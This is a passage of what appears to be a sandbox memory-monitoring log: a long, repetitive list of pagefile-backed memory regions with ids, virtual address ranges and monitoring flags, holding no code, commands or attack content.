region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2667 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2668 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2669 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2670 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2671 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2672 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2673 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2674 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2675 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2676 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2677 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2678 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2679 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2680 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2681 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2682 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2683 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2684 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2685 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2686 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2687 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2688 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2689 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2690 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2691 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2692 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2693 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2694 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2695 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2696 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2697 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2698 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2699 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2700 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2701 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2702 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2703 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2704 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2705 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2706 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2707 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2708 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2709 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2710 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2711 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2712 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2713 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2714 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2715 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2716 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2717 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2718 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2719 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2720 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2721 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2722 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2723 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2724 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2725 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2726 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2727 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2728 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2729 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2730 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2731 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2732 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2733 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2734 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2735 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2736 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2737 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2738 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2739 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2740 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2741 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2742 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2743 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2744 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2745 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2746 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2747 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2748 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2749 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2750 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2751 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2752 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2753 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2754 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2755 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2756 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2757 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2758 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2759 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2760 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2761 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2762 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2763 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2764 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2765 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2766 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2767 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2768 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2769 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2770 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2771 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2772 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2773 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2774 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2775 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2776 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2777 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2778 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2779 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2780 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2781 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2782 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2783 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2784 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2785 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2786 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2787 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2788 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2789 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2790 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2791 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2792 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2793 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2794 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2795 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2796 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2797 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2798 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2799 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2800 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2801 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2802 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2803 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2804 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2805 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2806 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2807 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2808 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2809 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2810 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2811 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2812 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2813 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2814 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2815 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2816 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2817 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2818 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2819 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2820 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2821 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2822 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2823 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 2824 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2825 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2826 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2827 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2828 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2829 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2830 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2831 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2832 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2833 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2834 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2835 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2836 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2837 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2838 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2839 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2840 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2841 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2842 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2843 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2844 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 2845 start_va = 